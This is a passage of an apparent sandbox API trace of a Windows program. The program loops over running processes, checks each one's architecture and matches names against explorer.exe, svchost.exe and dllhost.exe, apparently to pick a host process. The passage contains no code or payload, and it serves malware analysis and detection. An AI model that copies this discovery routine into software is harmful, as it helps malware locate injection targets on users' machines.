[0256.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0256.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0256.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0256.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0256.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0256.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0256.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0256.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0256.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0256.655] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.655] CloseHandle (hObject=0xd8) returned 1 [0256.655] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0256.655] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0256.655] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0256.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0256.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0256.656] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.656] CloseHandle (hObject=0xd8) returned 1 [0256.657] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0256.657] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0256.657] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0256.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0256.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0256.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0256.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0256.658] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.658] CloseHandle (hObject=0xd8) returned 1 [0256.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0256.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0256.659] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.659] CloseHandle (hObject=0xd8) returned 1 [0256.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0256.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0256.659] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.659] CloseHandle (hObject=0xd8) returned 1 [0256.659] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0256.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0256.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.660] CloseHandle (hObject=0xd8) returned 1 [0256.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0256.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0256.660] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.660] CloseHandle (hObject=0xd8) returned 1 [0256.660] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0256.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0256.661] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.661] CloseHandle (hObject=0xd8) returned 1 [0256.661] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0256.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0256.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.662] CloseHandle (hObject=0xd8) returned 1 [0256.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0256.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0256.662] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.662] CloseHandle (hObject=0xd8) returned 1 [0256.662] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0256.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0256.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.663] CloseHandle (hObject=0xd8) returned 1 [0256.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0256.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0256.663] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.663] CloseHandle (hObject=0xd8) returned 1 [0256.663] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0256.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0256.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.664] CloseHandle (hObject=0xd8) returned 1 [0256.664] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0256.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0256.664] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.664] CloseHandle (hObject=0xd8) returned 1 [0256.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0256.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0256.665] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.665] CloseHandle (hObject=0xd8) returned 1 [0256.665] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0256.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0256.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.666] CloseHandle (hObject=0xd8) returned 1 [0256.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0256.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0256.666] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.666] CloseHandle (hObject=0xd8) returned 1 [0256.666] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0256.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0256.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.667] CloseHandle (hObject=0xd8) returned 1 [0256.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0256.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0256.667] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.667] CloseHandle (hObject=0xd8) returned 1 [0256.667] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0256.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0256.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.668] CloseHandle (hObject=0xd8) returned 1 [0256.668] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0256.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0256.668] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.669] CloseHandle (hObject=0xd8) returned 1 [0256.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0256.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0256.669] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.669] CloseHandle (hObject=0xd8) returned 1 [0256.669] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0256.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0256.670] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.670] CloseHandle (hObject=0xd8) returned 1 [0256.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0256.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0256.670] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0256.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0256.671] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0256.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0256.672] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0256.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.673] CloseHandle (hObject=0xd8) returned 1 [0256.673] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0256.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0256.673] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.673] CloseHandle (hObject=0xd8) returned 1 [0256.673] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0256.673] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0256.673] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0256.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0256.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.674] CloseHandle (hObject=0xd8) returned 1 [0256.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0256.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.675] CloseHandle (hObject=0xd8) returned 1 [0256.675] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0256.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0256.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0256.675] CloseHandle (hObject=0xd8) returned 1 [0256.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0256.676] CloseHandle (hObject=0xd4) returned 1 [0256.676] Sleep (dwMilliseconds=0x3e8) [0257.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0257.715] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0257.715] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0257.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0257.716] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0257.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0257.717] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0257.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 